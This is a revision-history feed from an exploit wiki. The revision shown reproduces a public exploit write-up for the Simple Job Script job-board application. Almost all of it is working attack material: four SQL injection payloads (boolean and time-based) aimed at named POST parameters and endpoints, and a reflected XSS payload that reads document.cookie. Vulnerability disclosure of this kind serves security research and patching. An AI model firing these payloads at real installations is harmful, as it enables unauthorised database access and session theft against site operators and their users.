https://pwnwiki.com/index.php?action=history&feed=atom&title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E
SJS Simple Job Script SQL注入&XSS漏洞 - Revision history
2026-04-09T04:35:36Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E&diff=2030&oldid=prev
Pwnwiki: Created page with "==POC== <pre> # Exploit Title: Simple Job Script - Multiple Vulnerabilities # Date: 26.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://simplejobscript...."
2021-05-02T04:55:25Z
<p>Created page with "==POC== <pre> # Exploit Title: Simple Job Script - Multiple Vulnerabilities # Date: 26.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://simplejobscript...."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
# Exploit Title: Simple Job Script - Multiple Vulnerabilities<br />
# Date: 26.03.2019<br />
# Exploit Author: Ahmet Ümit BAYRAM<br />
# Vendor Homepage: https://simplejobscript.com/<br />
# Download Link:<br />
https://github.com/niteosoft/simplejobscript/archive/master.zip<br />
# Demo Site: https://demo.simplejobscript.com<br />
# Version: Lastest<br />
# Tested on: Kali Linux<br />
# CVE: N/A<br />
<br />
----- PoC 1: SQLi -----<br />
<br />
Request: http://localhost/[PATH]/searched<br />
Vulnerable Parameter: landing_location (POST)<br />
Payload:<br />
landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test<br />
<br />
<br />
<br />
----- PoC 2: SQLi -----<br />
<br />
Request: http://localhost/[PATH]/get_job_applications_ajax.php<br />
Vulnerable Parameter: job_id (POST)<br />
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20<br />
<br />
<br />
----- PoC 3: SQLi -----<br />
<br />
Request: http://localhost/[PATH]/register-recruiters<br />
Vulnerable Parameter: employerid (POST)<br />
Payload: if(now()=sysdate(),sleep(0),0)<br />
<br />
<br />
----- PoC 4: SQLi -----<br />
<br />
Request: http://localhost/[PATH]/delete_application_ajax.php<br />
Vulnerable Parameter: app_id (POST)<br />
Payload:<br />
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/<br />
<br />
<br />
----- PoC 5: XSS -----<br />
<br />
Request:<br />
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype<br />
Vulnerable Parameter: job_type_value[] (GET)<br />
Payload: "><svg+onload%3Dalert(document.cookie)><br />
<br />
</pre></div>
Pwnwiki